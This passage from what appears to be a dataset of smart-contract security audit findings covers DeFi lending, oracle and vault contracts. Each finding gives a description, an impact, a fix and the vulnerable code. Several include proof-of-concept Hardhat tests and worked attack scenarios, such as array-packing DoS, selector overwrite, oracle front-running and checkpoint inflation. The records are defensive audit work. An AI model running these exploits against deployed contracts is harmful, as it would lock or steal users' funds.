ethers.utils.parseUnits(\"100\", 8),\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n };\\n await router.connect(alice).exactInputSingle(swapping);\\n console.log(\"Swap success\");\\n\\n let paramsRep: 
LiquidityBorrowingManager.RepayParamsStruct = {\\n isEmergency: false,\\n internalSwapPoolfee: 500,\\n externalSwap: swapParamsRep,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 990, //<=slippage simulated\\n };\\n await borrowingManager.connect(bob).repay(paramsRep, deadline);\\n // Without swap\\n// Balance of hold token after repay: BigNumber { value: \"993951415\" }\\n// Balance of sale token after repay: BigNumber { value: \"99005137946252426108\" }\\n// When swap\\n// Balance of hold token after repay: BigNumber { value: \"993951415\" }\\n// Balance of sale token after repay: BigNumber { value: \"99000233164653177505\" }\\n```\\n\\nThe following table shows difference of recieved sale token:\\nSwap before repay transaction Token Balance of user after Repay\\nNo WETH 99005137946252426108\\nYes WETH 99000233164653177505\\nThe difference in the profit after repayment is 4904781599248603 weis, which is at the current market price of around 8 USD. The profit loss will depend on the liquidity in the pool, which depends on the type of pool and related tokens.чTo address this issue, avoid relying on slot0 and instead utilize Uniswap TWAP. 
Additionally, consider manually setting values for amountOutMin for swaps based on data acquired before repayment.чThe absence of slippage protection results in potential profit loss for the repayer.ч```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n -DoS of lenders and gas griefing by packing tokenIdToBorrowingKeys arraysчmediumч`LiquidityBorrowingManager.borrow()` calls the function `_addKeysAndLoansInfo()`, which adds user keys to the `tokenIdToBorrowingKeys` array of the borrowed-from LP position:\\n```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? 
tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n\\nA user key is calculated in the `Keys` library like so:\\n```\\n function computeBorrowingKey(\\n address borrower,\\n address saleToken,\\n address holdToken\\n ) internal pure returns (bytes32) {\\n return keccak256(abi.encodePacked(borrower, saleToken, holdToken));\\n }\\n```\\n\\n```\\n function addKeyIfNotExists(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n return;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n self.push(key);\\n }\\n\\n function removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nLet's give an example to see the potential impact and cost of the attack:\\nAn LP provider authorizes the contract to give loans from their large position. Let's say USDC/WETH pool.\\nThe attacker sees this and takes out minimum borrows of USDC using different addresses to pack the position's `tokenIdToBorrowingKeys` array. In `Constants.sol`, `MINIMUM_BORROWED_AMOUNT = 100000` so the minimum borrow is $0.1 dollars since USDC has 6 decimal places. Add this to the estimated gas cost of the borrow transaction, let's say $3.9 dollars. The cost to add one key to the array is approx. $4. The max block gas limit on ethereum mainnet is `30,000,000`, so divide that by 2000 gas, the approximate gas increase for one key added to the array. The result is 15,000, therefore the attacker can spend 60000 dollars to make any new borrows from the LP position unable to be repaid, transferred, or liquidated. 
Any new borrow will be stuck in the contract.\\nThe attacker now takes out a high leverage borrow on the LP position, for example $20,000 in collateral for a $1,000,000 borrow. The attacker's total expenditure is now $80,000, and the $1,000,000 from the LP is now locked in the contract for an arbitrary period of time.\\nThe attacker calls `increaseCollateralBalance()` on all of the spam positions. Default daily rate is .1% (max 1%), so over a year the attacker must pay 36.5% of each spam borrow amount to avoid liquidation and shortening of the array. If the gas cost of increasing collateral is $0.5 dollars, and the attacker spends another $0.5 dollars to increase collateral for each spam borrow, then the attacker can spend $1 on each spam borrow and keep them safe from liquidation for over 10 years for a cost of $15,000 dollars. The total attack expenditure is now $95,000. The protocol cannot easily increase the rate to hurt the attacker, because that would increase the rate for all users in the USDC/WETH market. Furthermore, the cost of the attack will not increase that much even if the daily rate is increased to the max of 1%. The attacker does not need to increase the collateral balance of the $1,000,000 borrow since repaying that borrow is DoSed.\\nThe result is that $1,000,000 of the lender's liquidity is locked in the contract for over 10 years for an attack cost of $95,000.ч`tokenIdToBorrowingKeys` tracks borrowing keys and is used in view functions to return info (getLenderCreditsCount() and getLenderCreditsInfo()). This functionality is easier to implement with arrays, but it can be done with mappings to reduce gas costs and prevent gas griefing and DoS attacks. For example the protocol can emit the borrows for all LP tokens and keep track of them offchain, and pass borrow IDs in an array to a view function to look them up in the mapping. 
Alternatively, OpenZeppelin's EnumerableSet library could be used to replace the array and keep track of all the borrows on-chain.чArray packing causes users to spend more gas on loans of the affected LP token. User transactions may out-of-gas revert due to increased gas costs. An attacker can lock liquidity from LPs in the contract for arbitrary periods of time for asymmetric cost favoring the attacker. The LP will earn very little fees over the period of the DoS.ч```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n -Adversary can overwrite function selector in _patchAmountAndCall due to inline assembly lack of overflow protectionчmediumч`The use of YUL or inline assembly in a solidity smart contract also makes integer overflow/ underflow possible even if the compiler version of solidity is 0.8. In YUL programming language, integer underflow & overflow is possible in the same way as Solidity and it does not check automatically for it as YUL is a low-level language that is mostly used for making the code more optimized, which does this by omitting many opcodes. 
Because of its low-level nature, YUL does not perform many security checks therefore it is recommended to use as little of it as possible in your smart contracts.`\\nSource\\nInline assembly lacks overflow/underflow protections, which opens the possibility of this exploit.\\nExternalCall.sol#L27-L38\\n```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n\\nIn the code above we see that `swapAmountInDataValue` is stored at `ptr + 36 (0x24) + swapAmountInDataIndex * 32 (0x20)`. The addition of 36 (0x24) in this scenario should prevent the function selector from being overwritten because of the extra 4 bytes (using 36 instead of 32). This is not the case though because `mul(swapAmountInDataIndex, 0x20)` can overflow since it is a uint256. This allows the attacker to target any part of the memory they choose by selectively overflowing to make it write to the desired position.\\nAs shown above, overwriting the function selector is possible although most of the time this value would be a complete nonsense since swapAmountInDataValue is calculated elsewhere and isn't user supplied. This also has a work around. By creating their own token and adding it as LP to a UniV3 pool, swapAmountInDataValue can be carefully manipulated to any value. This allows the attacker to selectively overwrite the function selector with any value they chose. 
This bypasses function selectors restrictions and opens calls to dangerous functions.чLimit `swapAmountInDataIndex` to a reasonable value such as uint128.max, preventing any overflow.чAttacker can bypass function restrictions and call dangerous/unintended functionsч```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n -Blacklisted creditor can block all repayment besides emergency closureчmediumч```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n\\nThe following code is executed for each loan when attempting to repay. Here we see that each creditor is directly transferred their tokens from the vault. If the creditor is blacklisted for holdToken, then the transfer will revert. This will cause all repayments to revert, preventing the user from ever repaying their loan and forcing them to default.чCreate an escrow to hold funds in the event that the creditor cannot receive their funds. Implement a try-catch block around the transfer to the creditor. 
If it fails then send the funds instead to an escrow account, allowing the creditor to claim their tokens later and for the transaction to complete.чBorrowers with blacklisted creditors are forced to defaultч```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n -Incorrect calculations of borrowingCollateral leads to DoS for positions in the current tick range due to underflowчmediumчThis calculation is most likely to underflow\\n```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n\\nThe `cache.borrowedAmount` is the calculated amount of holdTokens based on the liquidity of a position. `cache.holdTokenBalance` is the balance of holdTokens queried after liquidity extraction and tokens transferred to the `LiquidityBorrowingManager`. If any amounts of the saleToken are transferred as well, these are swapped to holdTokens and added to `cache.holdTokenBalance`.\\nSo in case when liquidity of a position is in the current tick range, both tokens would be transferred to the contract and saleToken would be swapped for holdToken and then added to `cache.holdTokenBalance`. This would make `cache.holdTokenBalance > cache.borrowedAmount` since `cache.holdTokenBalance == cache.borrowedAmount + amount of sale token swapped` and would make the tx revert due to underflow.чThe borrowedAmount should be subtracted from holdTokenBalance\\n```\\nuint256 borrowingCollateral = cache.holdTokenBalance - cache.borrowedAmount;\\n```\\nчMany positions would be unavailable to borrowers. 
For non-volatile positions like that which provide liquidity to stablecoin pools the DoS could last for very long period. For volatile positions that provide liquidity in a wide range this could also be for more than 1 year.ч```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n -Wrong `accLoanRatePerSeconds` in `repay()` can lead to underflowчmediumчBecause the `repay()` function resets the `dailyRateCollateralBalance` to 0 when the lender call didn't fully close the position. We want to be able to compute the missing collateral again.\\nTo do so we substract the percentage of collateral not paid to the `accLoanRatePerSeconds` so on the next call we will be adding extra second of fees that will allow the contract to compute the missing collateral.\\nThe problem lies in the fact that we compute a percentage using the borrowed amount left instead of the initial borrow amount causing the percentage to be higher. In practice this do allows the contract to recompute the missing collateral.\\nBut in the case of the missing `collateralBalance` or `removedAmt` being very high (ex: multiple days not paid or the loan removed was most of the position's liquidity) we might end up with a percentage higher than the `accLoanRatePerSeconds` which will cause an underflow.\\nIn case of an underflow the call will revert and the lender will not be able to get his tokens back.\\nConsider this POC that can be copied and pasted in the test files (replace all tests and just keep the setup & NFT creation):\\n```\\nit(\"Updated accRate is incorrect\", async () => {\\n const amountWBTC = ethers.utils.parseUnits(\"0.05\", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n 
];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\nчConsider that when a lender do an emergency liquidity restoration they give up on their collateral missing and so use the initial amount in the computation instead of borrowed amount left.\\n```\\nborrowingStorage.accLoanRatePerSeconds =\\n holdTokenRateInfo.accLoanRatePerSeconds -\\n FullMath.mulDiv(\\n uint256(-collateralBalance),\\n Constants.BP,\\n borrowing.borrowedAmount + removedAmt //old amount\\n );\\n```\\nчMedium. 
Lender might not be able to use `isEmergency` on `repay()` and will have to do a normal liquidation if he want his liquidity back.ч```\\nit(\"Updated accRate is incorrect\", async () => {\\n const amountWBTC = ethers.utils.parseUnits(\"0.05\", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n -Borrower collateral that they are owed can get stuck in Vault and not sent back to them after calling `repay`чmediumчFirst, let's say that a borrower called 
`borrow` in `LiquidityBorrowingManager`. Then, they call increase `increaseCollateralBalance` with a large collateral amount. A short time later, they decide they want to `repay` so they call `repay`.\\nIn `repay`, we have the following code:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nNotice that if we have `collateralBalance > 0` BUT `!((currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT)` (i.e. the first part of the if condition is fine but the second is not. It makes sense the second part is not fine because the borrower is repaying not long after they borrowed, so fees haven't had a long time to accumulate), then we will still go to `currentFees = borrowing.dailyRateCollateralBalance;` but we will not do:\\n```\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n```\\n\\nHowever, later on in the code, we have:\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nSo, the borrower's collateral will actually not even be sent back to the LiquidityBorrowingManager from the Vault (since we never incremented liquidationBonus). 
We later do:\n```\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\n```\n\nSo clearly the user will not receive their collateral back.чYou should separate:\n```\n if (\n collateralBalance > 0 &&\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\n Constants.MINIMUM_AMOUNT\n ) {\n liquidationBonus +=\n uint256(collateralBalance) /\n Constants.COLLATERAL_BALANCE_PRECISION;\n } else {\n currentFees = borrowing.dailyRateCollateralBalance;\n }\n```\n\nInto two separate if statements. One should check if `collateralBalance > 0`, and if so, increment liquidationBonus. The other should check `(currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT` and if not, set `currentFees = borrowing.dailyRateCollateralBalance;`.чUser's collateral will be stuck in Vault when it should be sent back to them. This could be a large amount of funds if for example `increaseCollateralBalance` is called first.ч```\n if (\n collateralBalance > 0 &&\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\n Constants.MINIMUM_AMOUNT\n ) {\n liquidationBonus +=\n uint256(collateralBalance) /\n Constants.COLLATERAL_BALANCE_PRECISION;\n } else {\n currentFees = borrowing.dailyRateCollateralBalance;\n }\n```\n -commitRequested() front-run malicious invalid oracleчmediumчExecution of the `commitRequested()` method restricts the `lastCommittedPublishTime` from going backward.\n```\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\n public\n payable\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, \"\")\n {\n// rest of code\n\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\n lastCommittedPublishTime = pythPrice.publishTime;\n// rest of code\n```\n\n`commit()` has a similar 
limitation and can set `lastCommittedPublishTime`.\\n```\\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n// rest of code\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code.\\n```\\n\\nThis leads to a situation where anyone can front-run `commitRequested()` and use his `updateData` to execute `commit()`. In order to satisfy the `commit()` constraint, we need to pass a `commit()` parameter set as follows\\nversionIndex= nextVersionIndexToCommit\\noracleVersion = versionList[versionIndex] - 1 and oralceVersion > _latestVersion\\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION\\nThis way `lastCommittedPublishTime` will be modified, causing `commitRequested()` to execute with `revert PythOracleNonIncreasingPublishTimes`\\nExample: Given: nextVersionIndexToCommit = 10 versionList[10] = 200\\n_latestVersion = 100\\nwhen:\\nkeeper exexute commitRequested(versionIndex = 10 , VAA{ publishTime = 205})\\nfront-run execute `commit(versionIndex = 10 , oracleVersion = 200-1 , VAA{ publishTime = 205})\\nversionIndex= nextVersionIndexToCommit (pass)\\noracleVersion = versionList[versionIndex] - 1 and oralceVersion > _latestVersion (pass)\\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION (pass)\\nBy the time the `keeper` submits the next VVA, the price may have passed its expiration dateчcheck `pythPrice` whether valid for `nextVersionIndexToCommit`\\n```\\n function commit(uint256 versionIndex, 
uint256 oracleVersion, bytes calldata updateData) external payable {\\n // Must be before the next requested version to commit, if it exists\\n // Otherwise, try to commit it as the next request version to commit\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n\\n PythStructs.Price memory pythPrice = _validateAndGetPrice(oracleVersion, updateData);\\n\\n // Price must be more recent than that of the most recently committed version\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n\\n // Oracle version must be more recent than that of the most recently committed version\\n uint256 minVersion = _latestVersion;\\n uint256 maxVersion = versionList.length > versionIndex ? 
versionList[versionIndex] : current();\\n\\n if (versionIndex < nextVersionIndexToCommit) revert PythOracleVersionIndexTooLowError();\\n if (versionIndex > nextVersionIndexToCommit && block.timestamp <= versionList[versionIndex - 1] // Add the line below\\n GRACE_PERIOD)\\n revert PythOracleGracePeriodHasNotExpiredError();\\n if (oracleVersion <= minVersion || oracleVersion >= maxVersion) revert PythOracleVersionOutsideRangeError();\\n// Add the line below\\n if (nextVersionIndexToCommit < versionList.length) {\\n// Add the line below\\n if (\\n// Add the line below\\n pythPrice.publishTime >= versionList[nextVersionIndexToCommit] // Add the line below\\n MIN_VALID_TIME_AFTER_VERSION &&\\n// Add the line below\\n pythPrice.publishTime <= versionList[nextVersionIndexToCommit] // Add the line below\\n MAX_VALID_TIME_AFTER_VERSION\\n// Add the line below\\n ) revert PythOracleUpdateValidForPreviousVersionError();\\n// Add the line below\\n }\\n\\n\\n _recordPrice(oracleVersion, pythPrice);\\n nextVersionIndexToCommit = versionIndex;\\n _latestVersion = oracleVersion;\\n }\\n```\\nчIf the user can control the oralce invalidation, it can lead to many problems e.g. 
invalidating `oracle` to one's own detriment, not having to take losses Maliciously destroying other people's profits, etc.ч```\\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\\n public\\n payable\\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, \"\")\\n {\\n// rest of code\\n\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code\\n```\\n -`Vault.update(anyUser,0,0,0)` can be called for free to increase `checkpoint.count` and pay smaller keeper fee than necessaryчmediumч`Vault._update(user, 0, 0, 0)` will pass all invariants checks:\\n```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif (context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n\\nIt then calculates amount to claim by calling _socialize:\\n```\\n// asses socialization and settlement fee\\nUFixed6 
claimAmount = _socialize(context, depositAssets, redeemShares, claimAssets);\\n// rest of code\\nfunction _socialize(\\n Context memory context,\\n UFixed6 depositAssets,\\n UFixed6 redeemShares,\\n UFixed6 claimAssets\\n) private view returns (UFixed6 claimAmount) {\\n // @audit global assets must be 0 to make (0,0,0) pass this function\\n if (context.global.assets.isZero()) return UFixed6Lib.ZERO;\\n UFixed6 totalCollateral = UFixed6Lib.from(_collateral(context).max(Fixed6Lib.ZERO));\\n claimAmount = claimAssets.muldiv(totalCollateral.min(context.global.assets), context.global.assets);\\n\\n // @audit for (0,0,0) this will revert (underflow)\\n if (depositAssets.isZero() && redeemShares.isZero()) claimAmount = claimAmount.sub(context.settlementFee);\\n}\\n```\\n\\n`_socialize` will immediately return 0 if `context.global.assets == 0`. If `context.global.assets > 0`, then this function will revert in the last line due to underflow (trying to subtract `settlementFee` from 0 claimAmount)\\nThis is the condition for this issue to happen: global assets must be 0. Global assets are the amounts redeemed but not yet claimed by users. 
So this can reasonably happen in the first days of the vault life, when users mostly only deposit, or claim everything they withdraw.\\nOnce this function passes, the following lines increase checkpoint.count:\\n```\\n// update positions\\ncontext.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.currentCheckpoint.update(depositAssets, redeemShares);\\n// rest of code\\n// Checkpoint library:\\n// rest of code\\nfunction update(Checkpoint memory self, UFixed6 deposit, UFixed6 redemption) internal pure {\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n self.count++;\\n}\\n```\\n\\nThe rest of the function executes normally.\\nDuring position settlement, pending user deposits and redeems are reduced by the keeper fees / checkpoint.count:\\n```\\n// Account library:\\n// rest of code\\nfunction processLocal(\\n Account memory self,\\n uint256 latestId,\\n Checkpoint memory checkpoint,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.latest = latestId;\\n (self.assets, self.shares) = (\\n self.assets.add(checkpoint.toAssetsLocal(redemption)),\\n self.shares.add(checkpoint.toSharesLocal(deposit))\\n );\\n (self.deposit, self.redemption) = (self.deposit.sub(deposit), self.redemption.sub(redemption));\\n}\\n// rest of code\\n// Checkpoint library\\n// toAssetsLocal / toSharesLocal calls _withoutKeeperLocal to calculate keeper fees:\\n// rest of code\\n function _withoutKeeperLocal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 keeperPer = self.count == 0 ? 
UFixed6Lib.ZERO : self.keeper.div(UFixed6Lib.from(self.count));\\n return _withoutKeeper(amount, keeperPer);\\n }\\n```\\n\\nAlso notice that in `processLocal` the only thing which keeper fees influence are deposits and redemptions, but not claims.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('inflate checkpoint count', async () => {\\n const settlementFee = parse6decimal('10.00')\\n const marketParameter = { // rest of code(await market.parameter()) }\\n marketParameter.settlementFee = settlementFee\\n await market.connect(owner).updateParameter(marketParameter)\\n const btcMarketParameter = { // rest of code(await btcMarket.parameter()) }\\n btcMarketParameter.settlementFee = settlementFee\\n await btcMarket.connect(owner).updateParameter(btcMarketParameter)\\n\\n const deposit = parse6decimal('10000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n await updateOracle()\\n await vault.settle(user.address)\\n\\n const deposit2 = parse6decimal('10000')\\n await vault.connect(user2).update(user2.address, deposit2, 0, 0)\\n\\n // inflate checkpoint.count\\n await vault.connect(btcUser1).update(btcUser1.address, 0, 0, 0)\\n await vault.connect(btcUser2).update(btcUser2.address, 0, 0, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).settle(user2.address)\\n\\n const checkpoint2 = await vault.checkpoints(3)\\n console.log(\"checkpoint count = \" + checkpoint2.count)\\n\\n var account = await vault.accounts(user.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log(\"User shares:\" + account.shares + \" assets: \" + assets);\\n var account = await vault.accounts(user2.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log(\"User2 shares:\" + account.shares + \" assets: \" + assets);\\n})\\n```\\n\\nConsole output:\\n```\\ncheckpoint count = 3\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:10013140463 assets: 
